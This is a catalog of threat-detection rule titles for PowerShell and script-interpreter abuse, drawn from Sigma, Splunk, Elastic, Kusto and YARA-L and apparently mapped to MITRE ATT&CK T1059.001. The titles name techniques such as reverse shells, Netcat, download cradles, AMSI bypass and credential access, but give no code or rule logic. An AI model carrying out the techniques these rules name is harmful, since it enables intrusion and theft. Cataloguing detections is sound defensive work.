- Sigma Invoke-Obfuscation VAR+ Launcher test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation VAR+ Launcher - Security test
- Sigma Invoke-Obfuscation VAR+ Launcher - System test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System test
- Sigma Invoke-Obfuscation Via Stdin test
- Sigma Invoke-Obfuscation Via Stdin - Powershell test
- Sigma Invoke-Obfuscation Via Stdin - PowerShell Module test
- Sigma Invoke-Obfuscation Via Stdin - Security test
- Sigma Invoke-Obfuscation Via Stdin - System test
- Sigma Invoke-Obfuscation Via Use Clip test
- Sigma Invoke-Obfuscation Via Use Clip - Powershell test
- Sigma Invoke-Obfuscation Via Use Clip - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Clip - Security test
- Sigma Invoke-Obfuscation Via Use Clip - System test
- Sigma Invoke-Obfuscation Via Use MSHTA test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use MSHTA - Security test
- Sigma Invoke-Obfuscation Via Use MSHTA - System test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Rundll32 - Security test
- Sigma Invoke-Obfuscation Via Use Rundll32 - System test
- Splunk Invoke-WebRequest Command (PowerShell)
- Splunk Invoke-WebRequest Command (Sysmon)
- Splunk Invoke-WebRequest Command (Windows Event Log)
- Kusto Java Executing cmd to run Powershell available
- Splunk Jscript Execution Using Cscript App production
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Lace Tempest PowerShell Evidence Eraser test
- Sigma Lace Tempest PowerShell Launcher test
- Sigma Lazarus Group Activity test
- Sigma Linux Suspicious Child Process from Node.js - React2Shell experimental
- Sigma Malicious Base64 Encoded PowerShell Keywords in Command Lines test
- Sigma Malicious Nishang PowerShell Commandlets test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Malicious PowerShell Keywords test
- Splunk Malicious PowerShell Process - Execution Policy Bypass production
- Splunk Malicious PowerShell Process With Obfuscation Techniques production
- Sigma Malicious PowerShell Scripts - FileCreation test
- Sigma Malicious PowerShell Scripts - PoshModule test
- Sigma Malicious ShellIntel PowerShell Commandlets test
- Sigma Manual Execution of Script Inside of a Compressed File test
- Sigma MERCURY APT Activity test
- Sigma Metasploit reverse shell injection in SQL Server experimental
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Elastic Microsoft Management Console File from Unusual Path production
- Kusto Midnight Blizzard - Script payload stored in Registry
- Sigma MMC Loading Script Engines DLLs experimental
- Splunk Modify Exchange Access Settings (PowerShell)
- Splunk MS Scripting Process Loading Ldap Module production
- Splunk MS Scripting Process Loading WMI Module production
- Sigma MSHTA Execution with Suspicious File Extensions test
- Sigma Net WebClient Casing Anomalies test
- Sigma Netcat The Powershell Version test
- Sigma Network Connection Initiated By PowerShell Process test
- Sigma Network Connection Initiated via Finger.EXE experimental
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New PowerShell Instance Created test
- Splunk NirCmd Execution (Sysmon)
- Splunk NirCmd Execution (Windows Event Log)
- Splunk Nishang PowershellTCPOneLine production
- Sigma Node Process Executions test
- Sigma NodeJS Execution of JavaScript File experimental
- Sigma Non Interactive PowerShell Process Spawned test
- Splunk Non-MSIExec .msi Installation (PowerShell)
- Splunk Non-MSIExec .msi Installation (Windows Event Log)
- Kusto NRT Base64 Encoded Windows Process Command-lines available
- Kusto NRT Process executed from binary hidden in Base64 encoded file available
- Sigma Nslookup PowerShell Download Cradle test
- Sigma NTFS Alternate Data Stream test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Sigma Obfuscated PowerShell OneLiner Execution test
- Kusto Office Apps Launching Wscipt available
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Operator Bloopers Cobalt Strike Commands test
- Sigma Operator Bloopers Cobalt Strike Modules test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled test
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Splunk Parent in Public Folder Suspicious Process (Sysmon)
- Splunk Parent in Public Folder Suspicious Process (Windows Event Log)
- Sigma Payload downloaded via PowerShell
- Sigma PCRE.NET Package Image Load test
- Sigma PCRE.NET Package Temp Files test
- Sigma Perl Inline Command Execution test
- Sigma Php Inline Command Execution test
- Sigma PipeShell exfiltration over named pipes experimental
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential APT FIN7 Exploitation Activity test
- Sigma Potential APT FIN7 POWERHOLD Execution test
- Sigma Potential APT10 Cloud Hopper Activity test
- Sigma Potential Arbitrary Command Execution Via FTP.EXE test
- Sigma Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt test
- Splunk Potential AutoHotkey .ahk Execution (PowerShell)
- Splunk Potential AutoHotkey .ahk Execution (Sysmon)
- Splunk Potential AutoHotkey .ahk Execution (Windows Event Log)
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential Bumblebee Remote Thread Creation test
- Sigma Potential CobaltStrike Process Patterns test
- Elastic Potential Command Shell via NetCat production
- Sigma Potential CommandLine Path Traversal Via Cmd.EXE test
- Sigma Potential CVE-2021-40444 Exploitation Attempt test
- Sigma Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution test
- Sigma Potential Data Exfiltration Activity Via CommandLine Tools test
- Sigma Potential DLL File Download Via PowerShell Invoke-WebRequest test
- Sigma Potential Dosfuscation Activity test
- Sigma Potential Dropper Script Execution Via WScript/CScript/MSHTA test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Emotet Activity stable
- Sigma Potential Encoded PowerShell Patterns In CommandLine test
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential KamiKakaBot Activity - Lure Document Execution test
- Sigma Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script test
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Sigma Potential PowerShell Command Line Obfuscation test
- Sigma Potential PowerShell Downgrade Attack test
- Sigma Potential PowerShell Obfuscation Using Alias Cmdlets test
- Sigma Potential PowerShell Obfuscation Using Character Join test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Sigma Potential PowerShell Obfuscation Via Reversed Commands test
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma Potential PowerShell Obfuscation Via WCHAR/CHAR test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potential Powershell ReverseShell Connection stable
- Sigma Potential POWERTRASH Script Execution test
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Sigma Potential QBot Activity stable
- Sigma Potential Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Sigma Potential Remote PowerShell Session Initiated test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Potential SAP NetWeaver Webshell Creation experimental
- Sigma Potential SAP NetWeaver Webshell Creation - Linux experimental
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Suspicious PowerShell Keywords test
- Elastic Potential Veeam Credential Access Command production
- Sigma Potential WinAPI Calls Via PowerShell Scripts test
- Sigma Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell stable
- Sigma Potentially Suspicious Command Executed Via Run Dialog Box - Registry test
- Sigma Potentially Suspicious Execution From Parent Process In Public Folder test
- Sigma Potentially Suspicious Inline JavaScript Execution via NodeJS Binary experimental
- Sigma Potentially Suspicious Long Filename Pattern - Linux experimental
- Sigma Potentially Suspicious NTFS Symlink Behavior Modification test
- Sigma Potentially Suspicious PowerShell Child Processes test
- Sigma Potentially Suspicious Powershell Script Execution From Temp Folder test
- Sigma Potentially Suspicious WebDAV LNK Execution test
- Splunk PowerShell - Connect To Internet With Hidden Window production
- Splunk PowerShell 4104 Hunting production
- Sigma PowerShell ADRecon Execution test
- Sigma PowerShell Base64 Encoded FromBase64String Cmdlet test
- Sigma PowerShell Base64 Encoded IEX Cmdlet test
- Sigma PowerShell Base64 Encoded Invoke Keyword test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Sigma PowerShell Base64 Encoded WMI Classes test
- Sigma PowerShell Called from an Executable Version Mismatch test
- Splunk PowerShell Clipboard Access (PowerShell)
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Sigma PowerShell Core DLL Loaded By Non PowerShell Process test
- Sigma PowerShell Create Local User test
- Splunk PowerShell CreateDecryptor (PowerShell)
- Splunk PowerShell CreateDecryptor (Sysmon)
- Splunk PowerShell CreateDecryptor (Windows Event Log)
- Splunk Powershell Creating Thread Mutex production
- Sigma PowerShell Credential Prompt test
- Splunk PowerShell Domain Enumeration production
- Splunk PowerShell Downgrade (PowerShell)
- Splunk PowerShell Downgrade (Sysmon)
- Splunk PowerShell Downgrade (Windows Event Log)
- Sigma PowerShell Downgrade Attack - PowerShell test
- Splunk PowerShell Download Activity (PowerShell)
- Sigma PowerShell Download and Execution Cradles test
- Sigma PowerShell Download Pattern test
- Sigma PowerShell Download Via Net.WebClient - PowerShell Classic test
- YARA-L PowerShell DownloadFile
- Splunk PowerShell DownloadFile_DownloadString (PowerShell)
- Splunk PowerShell DownloadFile_DownloadString (Sysmon)
- Splunk PowerShell DownloadFile_DownloadString (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerShell Enable PowerShell Remoting production
- Splunk PowerShell Environment Variable Execution production
- Sigma Powershell Execute Batch Script test
- Splunk Powershell Execute COM Object production
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk Powershell Fileless Script Contains Base64 Encoded Content production
- Splunk PowerShell Hidden Window (PowerShell)
- Splunk PowerShell Hidden Window (Windows Event Log)
- Splunk Powershell ICMP Data Exfiltration (PowerShell)
- Sigma Powershell Inline Execution From A File test
- Splunk Powershell Load Module in Meterpreter production
- Splunk PowerShell Loading DotNET into Memory via Reflection production
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Sigma Powershell MsXml COM Object test
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Processing Stream Of Data production
- Sigma PowerShell PSAttack test
- Sigma PowerShell Remote Session Creation test
- Splunk PowerShell Script Block With URL Chain production
- Sigma PowerShell Script Run in AppData test
- Sigma PowerShell ShellCode test
- Splunk PowerShell Start or Stop Service production
- Splunk Powershell Using memory As Backing Store production
- Sigma PowerShell Web Access Installation - PsScript test
- YARA-L PowerShell Web Download
- Splunk PowerShell WebRequest Using Memory Stream production
- Kusto PowerShell without powershell.exe
- Sigma Powershell XML Execute Command test
- Splunk PowerShell XML Retrieval (PowerShell)
- Splunk PowerShell XML Retrieval (Sysmon)
- Splunk PowerShell XML Retrieval (Windows Event Log)
- Sigma PowerView PowerShell Cmdlets - ScriptBlock test
- Splunk PowerView_SharpView Commands (PowerShell)
- Elastic Process Activity via Compiled HTML File production
- Kusto Process Creation with Suspicious CommandLine Arguments available
- Kusto Process executed from binary hidden in Base64 encoded file available
- Kusto Process Execution Frequency Anomaly available
- Splunk Process Writing DynamicWrapperX production
- Elastic Proxy Execution via Console Window Host production
- Sigma PSAsyncShell - Asynchronous TCP Reverse Shell test
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - Wsudo Suspicious Execution test
- Splunk Python Execution (Windows Event Log)
- Sigma Python Inline Command Execution test
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Python Path Configuration File Creation - Linux test
- Sigma Python Path Configuration File Creation - MacOS test
- Sigma Python Path Configuration File Creation - Windows test
- Sigma Python Spawning Pretty TTY on Windows test
- Kusto Qakbot Discovery Activies available
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Sigma Raspberry Robin Initial Execution From External Drive test
- Sigma Raspberry Robin Subsequent Execution of Commands test
- Sigma Read Contents From Stdin Via Cmd.EXE test
- Splunk Recon Using WMI Class production
- Kusto RecordedFuture Threat Hunting Hash All Actors
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Sigma Remote Access Tool - ScreenConnect Command Execution test
- Sigma Remote Access Tool - ScreenConnect File Transfer test
- Sigma Remote Access Tool - ScreenConnect Remote Command Execution test
- Sigma Remote Access Tool - ScreenConnect Temporary File test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote File Download via PowerShell production
- Elastic Remote File Download via Script Interpreter production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Sigma Remote PowerShell Sessions Network Connections (WinRM) test
- Sigma Remote Thread Creation Via PowerShell test
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Elastic Remote XSL Script Execution via COM production
- Elastic Renamed Automation Script Interpreter production
- Sigma Renamed CURL.EXE Execution test
- Sigma Renamed FTP.EXE Execution test
- Sigma Renamed NirCmd.EXE Execution test
- Sigma Renamed PingCastle Binary Execution test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma REvil Kaseya Incident Malware Patterns test
- Sigma Rorschach Ransomware Execution Activity test
- Sigma Ruby Inline Command Execution test
- Sigma Run PowerShell Script from Redirected Input Stream test
- Splunk Ryuk Wake on LAN Command production
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Splunk Script Connected to External Destination - Windows (Sysmon)
- Splunk Script Connected to External Destination - Windows (Windows Event Log)
- Elastic Script Execution via Microsoft HTML Application production
- Sigma Script Interpreter Execution From Suspicious Folder test
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Sigma Serial console process spawning CMD shell (via command) experimental
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Set Default PowerShell Execution Policy To Unrestricted or Bypass production
- Sigma Shai-Hulud Malware Indicators - Linux experimental
- Sigma Shai-Hulud Malware Indicators - Windows experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Sigma Silence.EDA Detection test
- Splunk Sliver C2 Implant Activity Pattern (PowerShell)
- Splunk Sliver C2 Implant Activity Pattern (Sysmon)
- Splunk Sliver C2 Implant Activity Pattern (Windows Event Log)
- Sigma Sofacy Trojan Loader Activity test
- Sigma SQL Client Tools PowerShell Session Detection test
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Kusto SUNBURST suspicious SolarWinds child processes (Normalized Process Events)
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious ArcSOC.exe Child Process experimental
- Splunk Suspicious Child Process for mshta.exe (Sysmon)
- Splunk Suspicious Child Process for mshta.exe (Windows Event Log)
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Sigma Suspicious Child Process of SAP NetWeaver experimental
- Sigma Suspicious Child Process of SAP NetWeaver - Linux experimental
- Elastic Suspicious Cmd Execution via WMI production
- Elastic Suspicious Command Prompt Network Connection production
- Sigma Suspicious CrushFTP Child Process experimental
- Sigma Suspicious Deno File Written from Remote Source experimental
- Sigma Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call test
- Sigma Suspicious Encoded PowerShell Command Line test
- Splunk Suspicious Executable by CMD.exe (Sysmon)
- Splunk Suspicious Executable by CMD.exe (Windows Event Log)
- Splunk Suspicious Executable by Powershell (EDR)
- Splunk Suspicious Executable by Powershell (Sysmon)
- Splunk Suspicious Executable by Powershell (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Sigma Suspicious Execution of Powershell with Base64 test
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Elastic Suspicious Execution with NodeJS production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Characteristics Due to Missing Fields test
- Sigma Suspicious File Created In PerfLogs test
- Sigma Suspicious File Execution From Internet Hosted WebDav Share test
- Sigma Suspicious Greedy Compression Using Rar.EXE test
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious HWP Sub Processes test
- Sigma Suspicious Interactive PowerShell as SYSTEM test
- Elastic Suspicious JavaScript Execution via Deno production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script test
- Splunk Suspicious Powershell (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (Sysmon)
- Splunk Suspicious PowerShell Clipboard Activity (Windows Event Log)
- Kusto Suspicious Powershell Commandlet Executed available
- Sigma Suspicious PowerShell Download - PoshModule test
- Sigma Suspicious PowerShell Download - Powershell Script test
- Sigma Suspicious PowerShell Download and Execute Pattern test
- Sigma Suspicious PowerShell Encoded Command Patterns test
- Sigma Suspicious PowerShell IEX Execution Patterns test
- Sigma Suspicious PowerShell Invocation From Script Engines test
- Sigma Suspicious PowerShell Invocations - Generic test
- Sigma Suspicious PowerShell Invocations - Generic - PowerShell Module test
- Sigma Suspicious PowerShell Invocations - Specific test
- Sigma Suspicious PowerShell Invocations - Specific - PowerShell Module test
- Sigma Suspicious PowerShell Parameter Substring test
- Splunk Suspicious PowerShell Parameter Substring (PowerShell)
- Splunk Suspicious PowerShell Parameter Substring (Sysmon)
- Splunk Suspicious PowerShell Parameter Substring (Windows Event Log)
- Sigma Suspicious PowerShell Parent Process test
- Sigma Suspicious PrinterPorts Creation (CVE-2020-1048) test
- Splunk Suspicious Process DNS Query Known Abuse Web Services production
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Splunk Suspicious Process With Discord DNS Query production
- Sigma Suspicious Program Names test
- Sigma Suspicious RASdial Activity test
- Splunk Suspicious reCAPTCHA Command Line (PowerShell)
- Splunk Suspicious reCAPTCHA Command Line (Sysmon)
- Sigma Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Sigma Suspicious Remote Child Process From Outlook test
- Sigma Suspicious Runscripthelper.exe test
- Sigma Suspicious Scan Loop Network test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Scripting in a WMI Consumer test
- Elastic Suspicious Shell Execution via Velociraptor production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious WSMAN Provider Image Loads test
- Sigma Suspicious XOR Encoded PowerShell Command test
- Elastic Suspicious Zoom Child Process production
- Sigma Sysprep on AppData Folder test
- Elastic System Information Discovery via Windows Command Shell production
- Elastic System Shells via Services production
- Kusto TEARDROP memory-only dropper available
- Sigma TropicTrooper Campaign November 2018 stable
- Sigma Turla Group Commands May 2020 test
- Sigma Turla Group Lateral Movement test
- Sigma UNC2452 PowerShell Pattern test
- Sigma UNC2452 Process Creation Patterns test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Sigma Uncommon PowerShell Hosts test
- Splunk Unloading AMSI via Reflection production
- Sigma Unusual Parent Process For Cmd.EXE test
- Elastic Unusual Parent Process for cmd.exe production
- Elastic Unusual Process For MSSQL Service Accounts production
- Sigma Unusually Long PowerShell CommandLine test
- Sigma Ursnif Redirection Of Discovery Commands test
- Sigma Usage Of Web Request Commands And Cmdlets test
- Sigma Usage Of Web Request Commands And Cmdlets - ScriptBlock test
- Sigma Use of FSharp Interpreters test
- Sigma Use of OpenConsole test
- Sigma Use of Pcalua For Execution test
- Splunk Vbscript Execution Using Wscript App production
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Vice Society directory crawling script for data exfiltration (via ps_script) stable
- Sigma VMToolsd Suspicious Child Process test
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk WebLogic CVE-2017-10271 (PowerShell)
- Splunk WebLogic CVE-2017-10271 (Sysmon)
- Splunk WebLogic CVE-2017-10271 (Windows Event Log)
- Splunk Wermgr Process Spawned CMD Or Powershell Process production
- Sigma WinAPI Function Calls Via PowerShell Scripts test
- Sigma WinAPI Library Calls Via PowerShell Scripts test
- Splunk Windows Account Access Removal via Logoff Exec production
- Splunk Windows Apache Benchmark Binary production
- Splunk Windows AutoIt3 Execution production
- Kusto Windows Binaries Executed from Non-Default Directory available
- Kusto Windows Binaries Lolbins Renamed available
- Splunk Windows Cmdline Tool Execution From Non-Shell Process production
- Splunk Windows Cobalt Strike PowerShell Loader production
- Splunk Windows Command and Scripting Interpreter Hunting Path Traversal production
- Splunk Windows Command and Scripting Interpreter Path Traversal Exec production
- Splunk Windows Command Shell DCRat ForkBomb Payload production
- Splunk Windows Copy Files (PowerShell)
- Splunk Windows Copy Files (Sysmon)
- Splunk Windows Copy Files (Windows Event Log)
- Splunk Windows Crowdstrike RTR Script Execution production
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Sigma Windows Defender AMSI Trigger Detected stable
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
- Sigma Windows Defender Exclusions Added - PowerShell test
- Elastic Windows Defender Exclusions Added via PowerShell production
- Sigma Windows Defender Threat Detected stable
- Splunk Windows Enable PowerShell Web Access production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows File Association Modification via Ftype production
- Splunk Windows File Download Via PowerShell production
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Splunk Windows Identify Protocol Handlers production
- Splunk Windows Outlook Macro Created by Suspicious Process production
- Splunk Windows PaperCut NG Spawn Shell production
- Splunk Windows Powershell Cryptography Namespace production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows PowerShell Get CIMInstance Remote Computer production
- Splunk Windows Powershell History File Deletion production
- Splunk Windows Powershell Import Applocker Policy production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows PowerShell Invoke-Sqlcmd Execution production
- Splunk Windows Powershell Logoff User via Quser production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
- Splunk Windows PowerShell Process With Malicious String production
- Splunk Windows Powershell RemoteSigned File production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows PowerShell Script Block With Malicious String production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Splunk Windows PowerShell Script TabExpansion Direct Call production
- Splunk Windows PowerShell WMI Win32 ScheduledJob production
- Splunk Windows PowGoop Beacon Decoding production
- Splunk Windows Process Accessing Windows Recall Directory production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows Remote Image Load production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Execution from Archive production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows Shell Process from CrushFTP production
- Sigma Windows Shell/Scripting Application File Write to Suspicious Folder test
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Splunk Windows Software Discovery Via PowerShell production
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
- Splunk Windows SQLCMD Execution production
- Splunk Windows SSH Proxy Command production
- Elastic Windows Subsystem for Linux Distribution Installed production
- Sigma Windows Suspicious Child Process from Node.js - React2Shell experimental
- Splunk Windows Suspicious React or Next.js Child Process production
- Splunk Windows Suspicious VMWare Tools Child Process production
- Elastic Windows System Information Discovery production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows TinyCC Shellcode Execution production
- Splunk Windows WinDBG Spawning AutoIt3 production
- Splunk Windows XLL File Creation Outside of Typical Location production
- Sigma WMImplant Hack Tool test
- Sigma Writing Of Malicious Files To The Fonts Folder test
- Sigma WScript or CScript Dropper - File test
- Sigma Wscript Shell Run In CommandLine test
- Splunk Wscript_Cscript Execution (PowerShell)
- Splunk Wscript_Cscript Execution (Sysmon)
- Splunk Wscript_Cscript Execution (Windows Event Log)
- Sigma WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript test
- Sigma XSL Script Execution Via WMIC.EXE test
- Sigma ZxShell Malware test
Command and Scripting Interpreter: PowerShell T1059.001 406 rules
- Sigma Alternate PowerShell Hosts - PowerShell Module test
- Sigma Alternate PowerShell Hosts Pipe test
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Bad Opsec Powershell Code Artifacts test
- Sigma Base64 Encoded PowerShell Command Detected test
- YARA-L Base64 Encoded PowerShell Command Detected
- Sigma BloodHound Collection Files test
- Sigma bXOR Operator Usage In PowerShell Command Line - PowerShell Classic test
- Splunk Bypass or Unrestricted PowerShell Execution (PowerShell)
- Sigma Certificate Exported Via PowerShell test
- Sigma Change PowerShell Policies to an Insecure Level test
- Sigma Change PowerShell Policies to an Insecure Level - PowerShell test
- Sigma ChromeLoader Malware Execution test
- Elastic Clearing Windows Console History production
- Sigma Cmd.EXE Missing Space Characters Execution Anomaly test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Execution via SolarWinds Process production
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Command-Line Interface Execution (PowerShell)
- Splunk Command-Line Interface Execution (Sysmon)
- Splunk Command-Line Interface Execution (Windows Event Log)
- Splunk Common Exchange Recon cmdlets (PowerShell)
- Sigma ConvertTo-SecureString Cmdlet Usage Via CommandLine test
- YARA-L ConvertTo-SecureString Cmdlet Usage Via CommandLine
- Sigma CVE-2022-24527 Microsoft Connected Cache LPE test
- Elastic Delayed Execution via Ping production
- Splunk Detect Certify With PowerShell Script Block Logging production
- Splunk Detect Empire with PowerShell Script Block Logging production
- Splunk Detect Mimikatz With PowerShell Script Block Logging production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Sigma DSInternals Suspicious PowerShell Cmdlets test
- Sigma DSInternals Suspicious PowerShell Cmdlets - ScriptBlock test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Splunk Encoded Powershell Command (PowerShell)
- Splunk Encoded Powershell Command (Sysmon)
- Splunk Encoded Powershell Command (Windows Event Log)
- Sigma Encoded PowerShell payload deployed (PowerShell) experimental
- Splunk Exchange PowerShell Module Usage production
